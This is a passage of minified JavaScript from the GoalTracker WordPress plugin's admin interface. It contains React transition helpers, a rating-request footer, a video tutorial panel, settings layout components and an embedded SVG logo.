e=_e(null==(n=L.props)?void 0:n.className,o.className),t=e?{className:e}:{};return(0,r.cloneElement)(L,Object.assign({},Ve(L.props,Xe(Ke(o,["ref"]))),M,c,function(...e){return{ref:e.every((e=>null==e))?void 0:t=>{for(let r of e)null!=r&&("function"==typeof r?r(t):r.current=t)}}}(L.ref,c.ref),t))}return(0,r.createElement)(u,Object.assign({},Ke(o,["ref"]),u!==r.Fragment&&c,u!==r.Fragment&&M),L)}function Ve(...e){if(0===e.length)return{};if(1===e.length)return e[0];let t={},r={};for(let a of e)for(let e in a)e.startsWith("on")&&"function"==typeof a[e]?(null!=r[e]||(r[e]=[]),r[e].push(a[e])):t[e]=a[e];if(t.disabled||t["aria-disabled"])return Object.assign(t,Object.fromEntries(Object.keys(r).map((e=>[e,void 0]))));for(let e in r)Object.assign(t,{[e](t,...a){let i=r[e];for(let e of i){if((t instanceof Event||(null==t?void 0:t.nativeEvent)instanceof Event)&&t.defaultPrevented)return;e(t,...a)}}});return t}function Je(e){var t;return Object.assign((0,r.forwardRef)(e),{displayName:null!=(t=e.displayName)?t:e.name})}function Xe(e){let t=Object.assign({},e);for(let e in t)void 0===t[e]&&delete t[e];return t}function Ke(e,t=[]){let r=Object.assign({},e);for(let e of t)e in r&&delete r[e];return r}let $e=(0,r.createContext)(null);$e.displayName="OpenClosedContext";var et=(e=>(e[e.Open=1]="Open",e[e.Closed=2]="Closed",e[e.Closing=4]="Closing",e[e.Opening=8]="Opening",e))(et||{});function tt(){return(0,r.useContext)($e)}function rt({value:e,children:t}){return r.createElement($e.Provider,{value:e},t)}var at=Object.defineProperty,it=(e,t,r)=>(((e,t,r)=>{t in e?at(e,t,{enumerable:!0,configurable:!0,writable:!0,value:r}):e[t]=r})(e,"symbol"!=typeof t?t+"":t,r),r);let nt=new class{constructor(){it(this,"current",this.detect()),it(this,"handoffState","pending"),it(this,"currentId",0)}set(e){this.current!==e&&(this.handoffState="pending",this.currentId=0,this.current=e)}reset(){this.set(this.detect())}nextId(){return++this.currentId}get isServer(){return"server"===this.current}get isClient(){return"client"===this.current}detect(){return"undefined"==typeof window||"undefined"==typeof document?"server":"client"}handoff(){"pending"===this.handoffState&&(this.handoffState="complete")}get isHandoffComplete(){return"complete"===this.handoffState}},ut=(e,t)=>{nt.isServer?(0,r.useEffect)(e,t):(0,r.useLayoutEffect)(e,t)};function st(){let e=(0,r.useRef)(!1);return ut((()=>(e.current=!0,()=>{e.current=!1})),[]),e}function lt(e){let t=(0,r.useRef)(e);return ut((()=>{t.current=e}),[e]),t}function ot(){let[e,t]=(0,r.useState)(nt.isHandoffComplete);return e&&!1===nt.isHandoffComplete&&t(!1),(0,r.useEffect)((()=>{!0!==e&&t(!0)}),[e]),(0,r.useEffect)((()=>nt.handoff()),[]),e}let ct=function(e){let t=lt(e);return r.useCallback(((...e)=>t.current(...e)),[t])},Lt=Symbol();function Mt(e,t=!0){return Object.assign(e,{[Lt]:t})}function dt(...e){let t=(0,r.useRef)(e);(0,r.useEffect)((()=>{t.current=e}),[e]);let a=ct((e=>{for(let r of t.current)null!=r&&("function"==typeof r?r(e):r.current=e)}));return e.every((e=>null==e||(null==e?void 0:e[Lt])))?void 0:a}function jt(e){"function"==typeof queueMicrotask?queueMicrotask(e):Promise.resolve().then(e).catch((e=>setTimeout((()=>{throw e}))))}function mt(){let e=[],t={addEventListener:(e,r,a,i)=>(e.addEventListener(r,a,i),t.add((()=>e.removeEventListener(r,a,i)))),requestAnimationFrame(...e){let r=requestAnimationFrame(...e);return t.add((()=>cancelAnimationFrame(r)))},nextFrame:(...e)=>t.requestAnimationFrame((()=>t.requestAnimationFrame(...e))),setTimeout(...e){let r=setTimeout(...e);return t.add((()=>clearTimeout(r)))},microTask(...e){let r={current:!0};return jt((()=>{r.current&&e[0]()})),t.add((()=>{r.current=!1}))},style(e,t,r){let a=e.style.getPropertyValue(t);return Object.assign(e.style,{[t]:r}),this.add((()=>{Object.assign(e.style,{[t]:a})}))},group(e){let t=mt();return e(t),this.add((()=>t.dispose()))},add:t=>(e.push(t),()=>{let r=e.indexOf(t);if(r>=0)for(let t of e.splice(r,1))t()}),dispose(){for(let t of e.splice(0))t()}};return t}function Nt(e,...t){e&&t.length>0&&e.classList.add(...t)}function yt(e,...t){e&&t.length>0&&e.classList.remove(...t)}function pt(){let[e]=(0,r.useState)(mt);return(0,r.useEffect)((()=>()=>e.dispose()),[e]),e}function gt({container:e,direction:t,classes:r,onStart:a,onStop:i}){let n=st(),u=pt(),s=lt(t);ut((()=>{let t=mt();u.add(t.dispose);let l=e.current;if(l&&"idle"!==s.current&&n.current)return t.dispose(),a.current(s.current),t.add(function(e,t,r,a){let i=r?"enter":"leave",n=mt(),u=void 0!==a?function(e){let t={called:!1};return(...r)=>{if(!t.called)return t.called=!0,e(...r)}}(a):()=>{};"enter"===i&&(e.removeAttribute("hidden"),e.style.display="");let s=qe(i,{enter:()=>t.enter,leave:()=>t.leave}),l=qe(i,{enter:()=>t.enterTo,leave:()=>t.leaveTo}),o=qe(i,{enter:()=>t.enterFrom,leave:()=>t.leaveFrom});return yt(e,...t.enter,...t.enterTo,...t.enterFrom,...t.leave,...t.leaveFrom,...t.leaveTo,...t.entered),Nt(e,...s,...o),n.nextFrame((()=>{yt(e,...o),Nt(e,...l),function(e,t){let r=mt();if(!e)return r.dispose;let{transitionDuration:a,transitionDelay:i}=getComputedStyle(e),[n,u]=[a,i].map((e=>{let[t=0]=e.split(",").filter(Boolean).map((e=>e.includes("ms")?parseFloat(e):1e3*parseFloat(e))).sort(((e,t)=>t-e));return t})),s=n+u;if(0!==s){r.group((r=>{r.setTimeout((()=>{t(),r.dispose()}),s),r.addEventListener(e,"transitionrun",(e=>{e.target===e.currentTarget&&r.dispose()}))}));let a=r.addEventListener(e,"transitionend",(e=>{e.target===e.currentTarget&&(t(),a())}))}else t();r.add((()=>t())),r.dispose}(e,(()=>(yt(e,...s),Nt(e,...t.entered),u())))})),n.dispose}(l,r.current,"enter"===s.current,(()=>{t.dispose(),i.current(s.current)}))),t.dispose}),[t])}function xt(e=""){return e.split(" ").filter((e=>e.trim().length>1))}let wt=(0,r.createContext)(null);wt.displayName="TransitionContext";var Tt=(e=>(e.Visible="visible",e.Hidden="hidden",e))(Tt||{});let Et=(0,r.createContext)(null);function St(e){return"children"in e?St(e.children):e.current.filter((({el:e})=>null!==e.current)).filter((({state:e})=>"visible"===e)).length>0}function Dt(e,t){let a=lt(e),i=(0,r.useRef)([]),n=st(),u=pt(),s=ct(((e,t=Ze.Hidden)=>{let r=i.current.findIndex((({el:t})=>t===e));-1!==r&&(qe(t,{[Ze.Unmount](){i.current.splice(r,1)},[Ze.Hidden](){i.current[r].state="hidden"}}),u.microTask((()=>{var e;!St(i)&&n.current&&(null==(e=a.current)||e.call(a))})))})),l=ct((e=>{let t=i.current.find((({el:t})=>t===e));return t?"visible"!==t.state&&(t.state="visible"):i.current.push({el:e,state:"visible"}),()=>s(e,Ze.Unmount)})),o=(0,r.useRef)([]),c=(0,r.useRef)(Promise.resolve()),L=(0,r.useRef)({enter:[],leave:[],idle:[]}),M=ct(((e,r,a)=>{o.current.splice(0),t&&(t.chains.current[r]=t.chains.current[r].filter((([t])=>t!==e))),null==t||t.chains.current[r].push([e,new Promise((e=>{o.current.push(e)}))]),null==t||t.chains.current[r].push([e,new Promise((e=>{Promise.all(L.current[r].map((([e,t])=>t))).then((()=>e()))}))]),"enter"===r?c.current=c.current.then((()=>null==t?void 0:t.wait.current)).then((()=>a(r))):a(r)})),d=ct(((e,t,r)=>{Promise.all(L.current[t].splice(0).map((([e,t])=>t))).then((()=>{var e;null==(e=o.current.shift())||e()})).then((()=>r(t)))}));return(0,r.useMemo)((()=>({children:i,register:l,unregister:s,onStart:M,onStop:d,wait:c,chains:L})),[l,s,i,M,d,L,c])}function ft(){}Et.displayName="NestingContext";let ht=["beforeEnter","afterEnter","beforeLeave","afterLeave"];function It(e){var t;let r={};for(let a of ht)r[a]=null!=(t=e[a])?t:ft;return r}let Ct=Be.RenderStrategy,zt=Je((function(e,t){let{show:a,appear:i=!1,unmount:n,...u}=e,s=(0,r.useRef)(null),l=dt(s,t);ot();let o=tt();if(void 0===a&&null!==o&&(a=(o&et.Open)===et.Open),![!0,!1].includes(a))throw new Error("A <Transition /> is used but it is missing a `show={true | false}` prop.");let[c,L]=(0,r.useState)(a?"visible":"hidden"),M=Dt((()=>{L("hidden")})),[d,j]=(0,r.useState)(!0),m=(0,r.useRef)([a]);ut((()=>{!1!==d&&m.current[m.current.length-1]!==a&&(m.current.push(a),j(!1))}),[m,a]);let N=(0,r.useMemo)((()=>({show:a,appear:i,initial:d})),[a,i,d]);(0,r.useEffect)((()=>{if(a)L("visible");else if(St(M)){let e=s.current;if(!e)return;let t=e.getBoundingClientRect();0===t.x&&0===t.y&&0===t.width&&0===t.height&&L("hidden")}else L("hidden")}),[a,M]);let y={unmount:n};return r.createElement(Et.Provider,{value:M},r.createElement(wt.Provider,{value:N},We({ourProps:{...y,as:r.Fragment,children:r.createElement(bt,{ref:l,...y,...u})},theirProps:{},defaultTag:r.Fragment,features:Ct,visible:"visible"===c,name:"Transition"})))})),bt=Je((function(e,t){let{beforeEnter:a,afterEnter:i,beforeLeave:n,afterLeave:u,enter:s,enterFrom:l,enterTo:o,entered:c,leave:L,leaveFrom:M,leaveTo:d,...j}=e,m=(0,r.useRef)(null),N=dt(m,t),y=j.unmount?Ze.Unmount:Ze.Hidden,{show:p,appear:g,initial:x}=function(){let e=(0,r.useContext)(wt);if(null===e)throw new Error("A <Transition.Child /> is used but it is missing a parent <Transition /> or <Transition.Root />.");return e}(),[w,T]=(0,r.useState)(p?"visible":"hidden"),E=function(){let e=(0,r.useContext)(Et);if(null===e)throw new Error("A <Transition.Child /> is used but it is missing a parent <Transition /> or <Transition.Root />.");return e}(),{register:S,unregister:D}=E,f=(0,r.useRef)(null);(0,r.useEffect)((()=>S(m)),[S,m]),(0,r.useEffect)((()=>{if(y===Ze.Hidden&&m.current)return p&&"visible"!==w?void T("visible"):qe(w,{hidden:()=>D(m),visible:()=>S(m)})}),[w,m,S,D,p,y]);let h=lt({enter:xt(s),enterFrom:xt(l),enterTo:xt(o),entered:xt(c),leave:xt(L),leaveFrom:xt(M),leaveTo:xt(d)}),I=function(e){let t=(0,r.useRef)(It(e));return(0,r.useEffect)((()=>{t.current=It(e)}),[e]),t}({beforeEnter:a,afterEnter:i,beforeLeave:n,afterLeave:u}),C=ot();(0,r.useEffect)((()=>{if(C&&"visible"===w&&null===m.current)throw new Error("Did you forget to passthrough the `ref` to the actual DOM node?")}),[m,w,C]);let z=x&&!g,b=!C||z||f.current===p?"idle":p?"enter":"leave",O=function(e=0){let[t,a]=(0,r.useState)(e),i=(0,r.useCallback)((e=>a((t=>t|e))),[t]),n=(0,r.useCallback)((e=>Boolean(t&e)),[t]),u=(0,r.useCallback)((e=>a((t=>t&~e))),[a]),s=(0,r.useCallback)((e=>a((t=>t^e))),[a]);return{flags:t,addFlag:i,hasFlag:n,removeFlag:u,toggleFlag:s}}(0),v=ct((e=>qe(e,{enter:()=>{O.addFlag(et.Opening),I.current.beforeEnter()},leave:()=>{O.addFlag(et.Closing),I.current.beforeLeave()},idle:()=>{}}))),k=ct((e=>qe(e,{enter:()=>{O.removeFlag(et.Opening),I.current.afterEnter()},leave:()=>{O.removeFlag(et.Closing),I.current.afterLeave()},idle:()=>{}}))),A=Dt((()=>{T("hidden"),D(m)}),E);gt({container:m,classes:h,direction:b,onStart:lt((e=>{A.onStart(m,e,v)})),onStop:lt((e=>{A.onStop(m,e,k),"leave"===e&&!St(A)&&(T("hidden"),D(m))}))}),(0,r.useEffect)((()=>{z&&(y===Ze.Hidden?f.current=null:f.current=p)}),[p,z,w]);let Y=j,U={ref:N};return g&&p&&nt.isServer&&(Y={...Y,className:_e(j.className,...h.current.enter,...h.current.enterFrom)}),r.createElement(Et.Provider,{value:A},r.createElement(rt,{value:qe(w,{visible:et.Open,hidden:et.Closed})|O.flags},We({ourProps:U,theirProps:Y,defaultTag:"div",features:Ct,visible:"visible"===w,name:"Transition.Child"})))})),Ot=Je((function(e,t){let a=null!==(0,r.useContext)(wt),i=null!==tt();return r.createElement(r.Fragment,null,!a&&i?r.createElement(zt,{ref:t,...e}):r.createElement(bt,{ref:t,...e}))})),vt=Object.assign(zt,{Child:Ot,Root:zt});function kt(){return(0,e.createElement)("footer",{"data-component":"PluginFooter",className:o()("bg-gray-100/75 shadow-lg rounded-b-lg",{"pt-8 pb-4":!0})},(0,e.createElement)("div",{className:"px-8 py-4"},!1,(0,e.createElement)("div",{className:"flex items-center text-base"},(0,e.createElement)("img",{className:"h-20 w-auto mr-6",src:Pe}),(0,e.createElement)("div",{className:"flex-1"},"We'd be super grateful if you could help us spread the word about"," ",(0,e.createElement)("strong",null,"GoalTracker")," and give it a",(0,e.createElement)("a",{className:"text-brand-primary px-1 py-0.5 border border-brand-primary/10 rounded mx-1",target:"_blank",href:"https://wordpress.org/support/plugin/goal-tracker-ga/reviews/#new-post"},(0,e.createElement)(Fe,null)," star rating"),"on WordPress?"),(0,e.createElement)("a",{type:"button",href:"https://wordpress.org/support/plugin/goal-tracker-ga/reviews/#new-post",target:"_blank",className:o()("ml-4","capitalize inline-flex","items-center justify-center","rounded-full","border border-transparent ","bg-white text-brand-primary","px-4 py-2","text-sm font-medium","shadow hover:shadow-xl","transform active:scale-75 hover:scale-110 transition-transform","hover:ring-2 hover:ring-white hover:ring-offset-2","focus:outline-none focus:ring-2 focus:ring-white focus:ring-offset-2")},(0,e.createElement)("span",{className:"mx-2"},"Rate us"," ",(0,e.createElement)(Fe,null)),(0,e.createElement)(Ge,{className:"h-5 w-5","aria-hidden":"true"})))))}(0,e.createElement)(e.Fragment,null,"Rate us"," ",(0,e.createElement)(Fe,null)),(0,e.createElement)(e.Fragment,null,"Rate us"," ",(0,e.createElement)(Fe,null)),(0,e.createElement)(e.Fragment,null,"Rate us"," ",(0,e.createElement)(Fe,null));const At=r.forwardRef((function(e,t){return r.createElement("svg",Object.assign({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24",strokeWidth:2,stroke:"currentColor","aria-hidden":"true",ref:t},e),r.createElement("path",{strokeLinecap:"round",strokeLinejoin:"round",d:"M6 18L18 6M6 6l12 12"}))})),{apiFetch:Yt}=wp;function Ut(t){let{showTutorial:a,showCloseButton:i}=t;const[n,u]=(0,r.useState)(a);return(0,r.useEffect)((()=>{u(a)}),[a]),(0,e.createElement)(e.Fragment,null,(0,e.createElement)(vt,{show:n,appear:!0,enter:"transition-opacity duration-75",enterFrom:"opacity-0",enterTo:"opacity-100",leave:"transition-opacity duration-500",leaveFrom:"opacity-100",leaveTo:"opacity-0"},(0,e.createElement)("div",{"data-component":"GeneralSettingsTutorial",className:"bg-white py-4 rounded-md border border-gray-200 my-10 mx-4 shadow-xl"},(0,e.createElement)("div",{className:""},(0,e.createElement)("div",{className:"px-4 pb-5"},(0,e.createElement)("div",{className:"mt-2 sm:flex sm:items-start sm:justify-between"},(0,e.createElement)("div",{className:"max-w-xl text-sm text-gray-500"},(0,e.createElement)("h3",{className:"text-3xl mb-6 leading-6 font-medium text-gray-900"},"Using the plugin for the first time?"),(0,e.createElement)("div",{className:"mt-2 text-xl"},"Watch our getting started guide video to get the plugin up and running on your website."),(0,e.createElement)("div",{className:"pt-3"},(0,e.createElement)("iframe",{width:"576",height:"360",src:"https://www.youtube.com/embed/X35iJBkwQeU",title:"YouTube video player",frameBorder:"0",allow:"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share",allowFullScreen:!0}))),i&&(0,e.createElement)("div",{className:"ml-3 flex h-7 items-center"},(0,e.createElement)("button",{type:"button",className:"rounded-md bg-white text-gray-400 hover:text-gray-500 focus:outline-none focus:ring-2 focus:ring-indigo-500",onClick:()=>(async()=>{u(!1),await Yt({path:wpGoalTrackerGa.rest.namespace+wpGoalTrackerGa.rest.version+"/hide_gs_tutorial_section",method:"POST",data:{hideGeneralSettingsTutorial:!0}})})()},(0,e.createElement)("span",{className:"sr-only"},"Close panel"),(0,e.createElement)(At,{className:"h-6 w-6","aria-hidden":"true"})))))))))}const Qt=()=>(0,e.createElement)("span",{className:"text-xs ml-2 py-0.5 bold px-2 rounded-full border border-brand-primary border-px inline hover:text-brand-primary text-brand-primary ","aria-hidden":"true"},"PRO"),Gt=t=>{const{children:r,id:a,label:i,description:n,isPrimary:u,isPro:s}=t;return(0,e.createElement)("fieldset",{"data-component":"Fieldset",role:"group","aria-labelledby":"label-track-Links",className:o()("sm:grid sm:grid-cols-3 sm:gap-4","sm:items-start","sm:border-t sm:border-gray-200 sm:pt-5")},(0,e.createElement)("label",{htmlFor:a,className:o()("font-medium text-gray-900",u?"text-base md:text-2xl":"text-sm md:text-base"),id:`label-${a}`},i,s&&(0,e.createElement)(Qt,null),(0,e.createElement)("p",{className:"text-gray-500 mt-4 text-sm"},n)),r&&(0,e.createElement)("div",{className:"mt-4 sm:mt-0 sm:col-span-2"},r))},Pt=t=>{const r=t.children;return(0,e.createElement)("div",{"data-component":"FieldsetGroup",className:o()("mt-6 sm:mt-5","space-y-6 sm:space-y-5","divide-y divide-gray-200",t.className)},r)},Rt=t=>{const r=t.children;return(0,e.createElement)("section",{"data-component":"Section",className:o()("w-full","py-10 px-6","space-y-8","divide-y divide-gray-200 rounded-md","border border-gray-200","bg-white shadow")},r)},Ft=(0,r.createContext)({open:!1,setOpenHelpSlider:()=>{},setComponent:()=>{},setTitleHelpSlider:()=>{}}),_t=()=>(0,r.useContext)(Ft);var qt=i(977),Bt=i.n(qt);const Zt=()=>(0,e.createElement)("span",{className:"text-xs ml-2 py-0.5 bold px-2 rounded-full border border-brand-danger border-px inline hover:text-brand-danger text-brand-danger","aria-hidden":"true"},"BETA"),Wt=r.forwardRef((function(e,t){return r.createElement("svg",Object.assign({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 20 20",fill:"currentColor","aria-hidden":"true",ref:t},e),r.createElement("path",{fillRule:"evenodd",d:"M10 18a8 8 0 100-16 8 8 0 000 16zm3.707-8.707l-3-3a1 1 0 00-1.414 1.414L10.586 9H7a1 1 0 100 2h3.586l-1.293 1.293a1 1 0 101.414 1.414l3-3a1 1 0 000-1.414z",clipRule:"evenodd"}))})),Ht=t=>(0,e.createElement)("a",{type:"button",href:t.ctaURL,className:o()("capitalize inline-flex","items-center justify-center","rounded-full","border border-transparent bg-brand-primary","pl-2 pr-1 py-1","font-medium text-white","shadow-sm","hover:text-white hover:bg-brand-600 shadow hover:shadow-xl active:shadow-xl","focus:outline-none focus:ring-2 focus:ring-brand-primary-focus focus:ring-offset-2","transform active:scale-75 hover:scale-105 transition-transform","focus:text-white",t.isTitle?"text-xl":"text-sm",t.className)},(0,e.createElement)("span",{className:"mx-2"},"Get Pro"),(0,e.createElement)(Wt,{className:o()("ml-1",t.isTitle?"h-8 w-8":"h-5 w-5"),"aria-hidden":"true"})),Vt=t=>{const{children:r,title:a,titleHelper:i,helpComponent:n,helpTitle:u,beta:s,proLabel:l,ctaURL:o}=t,{setOpenHelpSlider:c,setTitleHelpSlider:L,setComponent:M}=_t();return(0,e.createElement)("header",{"data-component":"HeaderTitle"},(0,e.createElement)("div",{className:"flex items-center"},(0,e.createElement)("h3",{className:"text-3xl leading-6 font-medium text-gray-900"},a),n&&(0,e.createElement)("button",{onClick:()=>{n&&u&&(L(u),M(n),c(!0))}},(0,e.createElement)(Bt(),{className:"h-8 w-8 ml-2 inline hover:text-brand-primary","aria-hidden":"true"})),s&&(0,e.createElement)(Zt,null),l&&(0,e.createElement)(Qt,null)),(0,e.createElement)("p",{className:"mt-2 max-w-2xl text-base text-gray-600"},i),l&&(0,e.createElement)(Ht,{className:"mt-4",isTitle:!0,ctaURL:o||""}),r)},Jt="data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4KPHN2ZyBpZD0iTGF5ZXJfMSIgZGF0YS1uYW1lPSJMYXllciAxIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9IjAgMCAxMjggMTI4Ij4KICA8ZGVmcz4KICAgIDxzdHlsZT4KICAgICAgLmNscy0xIHsKICAgICAgICBmaWxsOiAjZjdmN2Y3OwogICAgICB9CgogICAgICAuY2xzLTIgewogICAgICAgIGZpbGw6ICNlZjNlMmY7CiAgICAgIH0KICAgIDwvc3R5bGU+CiAgPC9kZWZzPgogIDxnPgogICAgPHBhdGggY2xhc3M9ImNscy0xIiBkPSJtNTcuMzIsMTE5LjRjLTcuMzctLjkyLTE1Ljc1LTMuOTktMjEuOTUtOS44Mi01LjkzLTUuNTgtOC45OC0xMi45OS04LjgzLTIxLjQuNDItMjMuNzksMjIuMTQtMzEsMzMuNTYtMzEuNDhoMGM5Ljc4LS40MSwyMC41NywzLjUyLDI3LjUsMTAuMDQsNS44LDUuNDUsOC45NCwxMi41OSw5LjA5LDIwLjY0LjM4LDIwLjQxLTE2LjQ3LDMxLjAxLTMyLjI5LDMyLjIzLTIuMTUuMTctNC41NS4xMS03LjA4LS4yMVptMi45LTU5Ljg0Yy0xMC40OS40NS0zMC40Miw3LjAxLTMwLjgxLDI4LjY3LS4xNCw3LjY5LDIuNTMsMTQuMTcsNy45MywxOS4yNiw3LjY4LDcuMjMsMTkuMDEsOS44NiwyNi44NCw5LjI2LDExLjE5LS44NywzMC4wMy04LjAxLDI5LjYzLTI5LjMyLS4xNC03LjM2LTIuODktMTMuNjMtOC4xOC0xOC42MS02LjM5LTYuMDEtMTYuMzYtOS42NC0yNS40MS05LjI2aDBaIi8+CiAgICA8cGF0aCBjbGFzcz0iY2xzLTEiIGQ9Im04OC4xMSw4OS4wM2MtLjI2LTguMzgtOC43OC0xOS4yMi0yNi4zMi0xOC43Mi0xNi42OC40Ny0yNS40MSw5LjAzLTI2LjAyLDIwLjA3LS43MSwxMi44NCwxMS40NywyMi4wOSwyOC42NiwyMC45MSwxOS4xOS0xLjMyLDIzLjk0LTEzLjg4LDIzLjY4LTIyLjI1Wm0tMzguMjYsNy43MmMtLjY5LS4yNi0xLjEtLjg2LTEuMjUtMS41My0uNS0yLjM3LS42NC00Ljg5LS4xMS03LjI4LjQzLTEuOCwzLjAzLTIuMDEsMy43Ny0uMzUsMS4xOCwyLjEsMS41OCwxMC4zOS0yLjQxLDkuMTVabTI1LjEzLTIuMzNjLS42NCwxLjc0LTMuMjUsMS42MS0zLjczLS4xNS0uNi0yLjQ0LS43Mi01LjA2LS4xOC03LjUzLjQzLTEuOCwzLjAzLTIuMDEsMy43Ni0uMzUsMS4xMSwyLjU4LDEuMDYsNS40MS4xNSw4LjAzWiIvPgogICAgPHBhdGggY2xhc3M9ImNscy0yIiBkPSJtNTguODcsOTEuMDJjMS4zNCwxLjI3LDMuNDIsMS43LDUuMDEuNjkuNTUtLjMxLDEuMDEtLjc3LDEuMzYtMS4yNy40Ni0uNjYsMS41Mi0uMTQsMS4yOC42Mi0uODQsMi43NS00LjM0LDMuOTItNi43OSwyLjU4LS43OC0uNC0yLjg5LTEuODItMS43Ni0yLjc1LjMtLjE4LjY4LS4xMi45MS4xM2gwWiIvPgogICAgPHBhdGggY2xhc3M9ImNscy0yIiBkPSJtNDYuNzIsNDcuNDRjLS4xOSwxLjczLDEwLjczLDUuOTQsMTIuNzcsNS45NmwuMTYtMTAuMDNzLTEyLjcxLDIuMDgtMTIuOTMsNC4wN1oiLz4KICAgIDxwYXRoIGNsYXNzPSJjbHMtMSIgZD0ibTYwLjM2LDYyLjk2Yy0uODYtLjItMS41MS0uOTgtMS40OS0xLjlsLjI3LTE2LjY2Yy4wMi0xLjA2Ljg5LTEuOSwxLjk0LTEuODhzMS45Ljg5LDEuODgsMS45NGwtLjI3LDE2LjY2Yy0uMDIsMS4wNi0uODksMS45LTEuOTQsMS44OC0uMTMsMC0uMjctLjAyLS4zOS0uMDVaIi8+CiAgPC9nPgogIDxnPgogICAgPHBhdGggY2xhc3M9ImNscy0xIiBkPSJtOTMuNjcsNDAuNDZjLTQuMDEuNS04Ljg1LDAtMTIuOS0yLjI0LTMuODgtMi4xNS02LjQ4LTUuNjUtNy41My0xMC4xMS0yLjk3LTEyLjYxLDcuNTMtMTkuMzMsMTMuNDktMjEuMTFoMGM1LjExLTEuNTMsMTEuMzMtLjksMTUuODYsMS42MSwzLjc5LDIuMSw2LjQxLDUuNDUsNy41Niw5LjY4LDIuOTQsMTAuNzItNC41NCwxOC41OC0xMi43MiwyMS4zNC0xLjExLjM4LTIuMzkuNjctMy43Ni44NFptLTYuNDktMzEuOTdjLTUuNDgsMS42NC0xNS4xMiw3Ljc4LTEyLjQyLDE5LjI2Ljk2LDQuMDgsMy4yNCw3LjE0LDYuNzcsOS4xLDUuMDIsMi43OSwxMS4zNSwyLjY2LDE1LjQxLDEuMjksNS43OS0xLjk2LDE0Ljc4LTguMjUsMTEuNzEtMTkuNDUtMS4wNi0zLjg3LTMuMzUtNi44MS02LjgxLTguNzItNC4xOC0yLjMxLTkuOTMtMi45LTE0LjY1LTEuNDhoMFoiLz4KICAgIDxwYXRoIGNsYXNzPSJjbHMtMSIgZD0ibTg5LjQ1LDEzLjk1Yy04Ljc0LDIuNDgtMTIuMiw4LjE3LTExLjA1LDE0LjA4LDEuMzUsNi44Nyw5LjAxLDEwLjEyLDE3LjkzLDcuMTksOS45NS0zLjI3LDEwLjc4LTEwLjUzLDkuNTEtMTQuOTItMS4yNi00LjM5LTcuMjEtOC45Ny0xNi40LTYuMzVabS01Ljg2LDEzLjExYy4wNS0uNC4zMS0uNjkuNjQtLjg2LDEuMTgtLjU4LDIuNDktLjk5LDMuODMtMS4wMywxLjAxLS4wMSwxLjQ3LDEuMzMuNjksMS45NC0uOTUuOS01LjI3LDIuMjItNS4xNS0uMDVabTkuOTYuMjZjLTEuNTctLjA4LTIuNjUtMS43Ny0yLjI3LTMuMjQuMTEtLjQ2LjU3LTEuNzcsMS4yMS0xLjI5LjE0LjEzLjE1LjM0LjA1LjUtLjQ5Ljg4LS40NCwyLjAzLjMxLDIuNzMuMjQuMjUuNTQuNDMuODUuNTUuNDEuMTUuMjguNzgtLjE2Ljc2Wm02LjQtNS43N2MxLC4xLDEuMjksMS41LjQyLDEuOTktMS4yMS42NC0yLjU4LDEuMDYtMy45NSwxLjEtMS4wMS4wMi0xLjQ3LTEuMzMtLjY5LTEuOTQsMS4yMS0uOTMsMi43MS0xLjI4LDQuMjItMS4xNVoiLz4KICAgIDxwYXRoIGNsYXNzPSJjbHMtMSIgZD0ibTc1LjkxLDI3LjcyYy42LDIsLjU1LDMuNzgtLjcsNC4xNi0xLjI1LjM4LTMuMjQtLjc4LTMuODQtMi43OC0uNi0yLC40LTQuMDcsMS42NS00LjQ0czIuMjgsMS4wNywyLjg5LDMuMDdaIi8+CiAgICA8cGF0aCBjbGFzcz0iY2xzLTEiIGQ9Im0xMDcuMzEsMTguMjFjLjY0LDEuOTgsMS43LDMuNDIsMi45NSwzLjAxLDEuMjUtLjQxLDIuMjEtMi41LDEuNTYtNC40OC0uNjQtMS45OC0yLjY1LTMuMTEtMy45LTIuNy0xLjI0LjQxLTEuMjYsMi4xOS0uNjEsNC4xN1oiLz4KICA8L2c+CiAgPGc+CiAgICA8cGF0aCBjbGFzcz0iY2xzLTEiIGQ9Im0yNC43Miw0MS43M2MtMy45MS0xLjA0LTguMi0zLjMzLTExLjExLTYuOTQtMi43OC0zLjQ1LTMuODctNy42OC0zLjE3LTEyLjIsMi0xMi44LDE0LjI2LTE1LjA3LDIwLjQ1LTE0LjQ4aDBjNS4zMS41MSwxMC44MywzLjQ0LDE0LjA4LDcuNDcsMi43MiwzLjM4LDMuODgsNy40NiwzLjM2LDExLjgyLTEuMzIsMTEuMDQtMTEuMiwxNS41LTE5LjgyLDE0Ljk4LTEuMTctLjA3LTIuNDYtLjI4LTMuOC0uNjRabTYuMDQtMzIuMDZjLTUuNjktLjU0LTE2Ljk0LDEuNTEtMTguNzYsMTMuMTYtLjY1LDQuMTQuMzEsNy44MywyLjg0LDEwLjk4LDMuNiw0LjQ4LDkuNTIsNi43NCwxMy43OSw3LDYuMS4zNywxNi44LTIuMDgsMTguMTgtMTMuNi40OC0zLjk4LS41NC03LjU3LTMuMDMtMTAuNjUtMy0zLjcyLTguMS02LjQyLTEzLjAyLTYuODloMFoiLz4KICAgIDxwYXRoIGNsYXNzPSJjbHMtMSIgZD0ibTMwLjgsMTUuNTljLTkuMDMtLjk5LTE0LjM4LDIuOTgtMTUuNTQsOC44OC0xLjM0LDYuODcsNC41NCwxMi43NywxMy45LDEzLjQyLDEwLjQ1LjcyLDEzLjk1LTUuNywxNC40My0xMC4yNC40OC00LjU0LTMuMy0xMS4wMi0xMi44LTEyLjA2Wm0tOC40MiwxMy4zN2MtLjM1LS4xOS0uNTMtLjU0LS41Ni0uOTItLjA5LTEuMzIuMDItMi42OS40OS0zLjk0LjM3LS45NCwxLjc4LS44NiwyLjA2LjA5LjQ4LDEuMjIuMDgsNS43Mi0xLjk4LDQuNzZabTEzLjczLjYyYy0uNDcuODktMS44Ny42Mi0yLS4zNi0uMTQtMS4zNiwwLTIuNzguNDctNC4wOC4zNy0uOTQsMS43OC0uODYsMi4wNi4wOS40LDEuNDcuMTcsMy0uNTIsNC4zNFptLTYuOTIsNC42NGMtLjQ3Ljg5LTEuODcuNjItMi0uMzYtLjE0LTEuMzYsMC0yLjc4LjQ3LTQuMDguMzctLjk0LDEuNzgtLjg2LDIuMDYuMDkuNCwxLjQ3LjE3LDMtLjUyLDQuMzRa